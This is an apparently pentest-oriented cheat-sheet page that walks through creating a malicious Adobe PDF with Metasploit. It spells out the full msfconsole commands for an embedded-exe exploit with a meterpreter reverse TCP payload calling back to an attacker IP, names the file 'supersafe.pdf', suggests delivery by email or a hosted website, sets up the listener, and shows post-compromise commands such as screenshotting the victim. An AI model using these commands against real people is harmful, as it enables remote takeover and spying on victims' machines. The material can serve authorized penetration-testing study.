Adobe PDF Attack
Last modified: 2023-07-24
Attackers can compromise target machine by sending malicious PDF.
The PDF created by this process can be easily detected by modern Windows built-in antivirus. So this exploitation may be not useful for attackers.
Attackers can create a malicious PDF using metasploit.
msfconsole msf> use exploit/windows/fileformat/adobe_pdf_embedded_exe # Set payload for windows if target machine is windows msf> set payload windows/x64/meterpreter/reverse_tcp # Set the attacker's ip address msf> set lhost 10.0.0.1 # Change filename msf> set filename supersafe.pdf # Optionally, the custom PDF can be used msf> set infilename /path/to/custom.pdf msf> exploit
After creating a PDF, attackers need to send it to target user. There are various ways to do that. For example,
- Host the PDF in attacker’s website.
- Send an email with this PDF attached.
To receive incoming connection from target machine, attackers start a listener in their machine.
msf> use exploit/multi/handler # Match the payload when PDF was created msf> set payload windows/x64/meterpreter/reverse_tcp # Set the attacker's ip address msf> set lhost 10.0.0.1 msf> exploit
When a victim open the PDF using Adobe Reader, this file starts a reverse shell to connect the attacker’s machine.
After that, attackers can control the victim’s machine in their terminal.
# In metasploit session meterpreter> pwd # Take a screenshot of the victim's screen meterpreter> screenshot